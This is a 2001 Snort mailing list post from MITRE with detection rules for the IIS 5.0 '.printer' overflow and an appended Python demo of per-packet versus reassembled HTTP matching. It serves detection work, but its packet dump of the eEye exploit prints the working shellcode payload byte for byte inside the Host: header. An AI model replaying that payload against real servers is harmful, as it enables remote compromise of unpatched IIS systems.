Snort mailing list archives
IIS 5.0 printer exploit signature
From: Brian Caswell <bmc () mitre org>
Date: Wed, 02 May 2001 16:34:25 -0400
Snort 1.8 rule:

alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS printer attempt"; uricontent:".printer"; nocase; flags:A+; reference:cve,CAN-2001-0241; classtype:attempted-admin;)

Snort 1.7 rule:

alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS printer attempt"; content:".printer"; nocase; flags:A+; reference:cve,CAN-2001-0241;)

Snort 1.6.3 rule:

alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS printer attempt"; content:".printer"; nocase; flags:AP;)

Below is a packet dump from the eEye exploit. Until we have session decodes, we can't check both Host: and the URI. (Adding as many HTTP headers as you want can offset the Host: header into a different packet.) We could use an activate/dynamic rule pair to be more accurate, but as a standard we haven't used those in the snort.org ruleset yet. This looks like the first time. Check back later for an activate/dynamic rule that is more specific.

05/02-16:23:12.028893 192.168.0.9:16777 -> 192.168.0.10:80
TCP TTL:64 TOS:0x0 ID:28940 IpLen:20 DgmLen:383 DF
***AP*** Seq: 0x51D013C1  Ack: 0x57194C33  Win: 0x4470  TcpLen: 20
47 45 54 20 2F 6E 75 6C 6C 2E 70 72 69 6E 74 65  GET /null.printe
72 20 48 54 54 50 2F 31 2E 31 0D 0A 48 6F 73 74  r HTTP/1.1..Host
3A 20 8B C4 83 C0 11 33 C9 66 B9 20 01 80 30 03  : .....3.f. ..0.
40 E2 FA EB 03 03 03 03 5C 88 E8 82 EF 8F 09 03  @.......\.......
03 44 80 3C FC 76 F9 80 C4 07 88 F6 30 CA 83 C2  .D.<.v......0...
07 88 04 8A 05 80 C5 07 80 C4 07 E1 F7 30 C3 8A  .............0..
3D 80 C5 07 80 C4 17 8A 3D 80 C5 07 30 C3 82 C4  =.......=...0...
FC 03 03 03 53 6B 83 03 03 03 69 01 53 53 6B 03  ....Sk....i.SSk.
03 03 43 FC 76 13 FC 56 07 88 DB 30 C3 53 54 69  ..C.v..V...0.STi
48 FC 76 17 50 FC 56 0F 50 FC 56 03 53 FC 56 0B  H.v.P.V.P.V.S.V.
FC FC FC FC CB A5 EB 74 8E 28 EA 74 B8 B3 EB 74  .......t.(.t...t
27 49 EA 74 60 39 5F 74 74 74 2D 66 46 7A 66 2D  'I.t`9_ttt-fFzf-
60 6C 6E 2D 77 7B 77 03 6A 6A 70 6B 62 60 68 31  `ln-w{w.jjpkb`h1
68 23 2E 23 66 46 7A 66 23 47 6A 64 77 6A 62 6F  h#.#fFzf#Gjdwjbo
23 50 66 60 76 71 6A 77 7A 0E 09 23 45 6C 71 23  #Pf`vqjwz..#Elq#
67 66 77 62 6A 6F 70 23 75 6A 70 6A 77 39 23 4B  gfwbjop#ujpjw9#K
77 77 73 39 2C 2C 74 74 74 2D 66 46 7A 66 2D 60  wws9,,ttt-fFzf-`
6C 6E 03 03 03 03 03 03 03 03 03 03 03 03 03 03  ln..............
03 03 03 03 03 03 90 90 90 90 90 90 90 90 CB 4A  ...............J
42 6C 90 90 90 90 66 81 EC 14 01 FF E4 03 03 03  Bl....f.........
03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03  ................
03 03 03 0D 0A 0D 0A                             .......

-- 
Brian Caswell
The MITRE Corporation

_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
http://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list=snort-users
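The caveat in the post (a rule that wants both the URI and the Host: header cannot be written reliably per packet, because extra headers can push Host: into a later TCP segment) is easy to show with a small model. The following is an added example written for this page; it is not from the original post or from the snort.org ruleset. It splits two constructed HTTP requests into TCP-sized segments, applies a stateless "both strings in the same packet" check the way a single content rule would, and then applies the same check over the reassembled stream. The request bodies, header names and the mss values are constructed for the demonstration; no exploit payload is used.

```python
"""Per-packet vs. reassembled-stream matching for an IIS '.printer' rule.

Added example (not from the original post or the snort.org ruleset). It
models the caveat that checking both the URI and the Host: header fails per
packet once padding headers push Host: into a later TCP segment. All
requests below are constructed for the demo.
"""

from __future__ import annotations

# Constructed sample: a short request; Host: lands in the first segment.
SHORT_REQUEST = (
    b"GET /null.printer HTTP/1.1\r\n"
    + b"Host: www.example.invalid\r\n"
    + b"\r\n"
)

# Constructed sample: eight padding headers ahead of Host:, so with a small
# MSS the Host: line is carried in a second segment.
PADDED_REQUEST = (
    b"GET /null.PRINTER HTTP/1.1\r\n"
    + b"".join(b"X-Pad-%d: %s\r\n" % (i, b"a" * 60) for i in range(8))
    + b"Host: www.example.invalid\r\n"
    + b"\r\n"
)


def segment_payload(request: bytes, mss: int) -> list[bytes]:
    """Split an application payload into TCP segments of at most `mss` bytes."""
    return [request[i:i + mss] for i in range(0, len(request), mss)]


def uri_printer_hit(payload: bytes) -> bool:
    """The post's 1.7-style rule in spirit: content:".printer"; nocase on one packet."""
    return b".printer" in payload.lower()


def per_packet_host_and_uri(segments: list[bytes]) -> bool:
    """Stateless check: '.printer' and 'Host:' must appear in the SAME segment."""
    for seg in segments:
        low = seg.lower()
        if b".printer" in low and b"host:" in low:
            return True
    return False


def parse_request(stream: bytes) -> tuple[str, dict[str, str]] | None:
    """Parse request line and headers from a fully reassembled HTTP request."""
    head, sep, _ = stream.partition(b"\r\n\r\n")
    if not sep:
        return None  # headers not complete yet
    lines = head.split(b"\r\n")
    parts = lines[0].split(b" ")
    if len(parts) != 3:
        return None
    headers: dict[str, str] = {}
    for line in lines[1:]:
        name, colon, value = line.partition(b":")
        if not colon:
            return None
        headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    return parts[1].decode("latin-1"), headers


def reassembled_host_and_uri(segments: list[bytes]) -> bool:
    """Stateful check: reassemble the stream, then inspect URI and Host: together."""
    parsed = parse_request(b"".join(segments))
    if parsed is None:
        return False
    uri, headers = parsed
    path = uri.split("?", 1)[0]
    return path.lower().endswith(".printer") and "host" in headers


def compare(request: bytes, mss: int) -> dict[str, bool | int]:
    """Run all three checks on one request and report the outcome."""
    segs = segment_payload(request, mss)
    return {
        "segments": len(segs),
        "uri_only_rule": any(uri_printer_hit(s) for s in segs),
        "per_packet_host_and_uri": per_packet_host_and_uri(segs),
        "reassembled_host_and_uri": reassembled_host_and_uri(segs),
    }


if __name__ == "__main__":
    for name, req in (("short", SHORT_REQUEST), ("padded", PADDED_REQUEST)):
        print(name, compare(req, mss=512))
```

The URI-only rule fires on both requests, which is why the post ships it as the interim signature. The per-packet Host:-plus-URI check fires on the short request and misses the padded one, while the reassembled check catches both; that gap is what session decodes (or the activate/dynamic pair the post mentions) are meant to close.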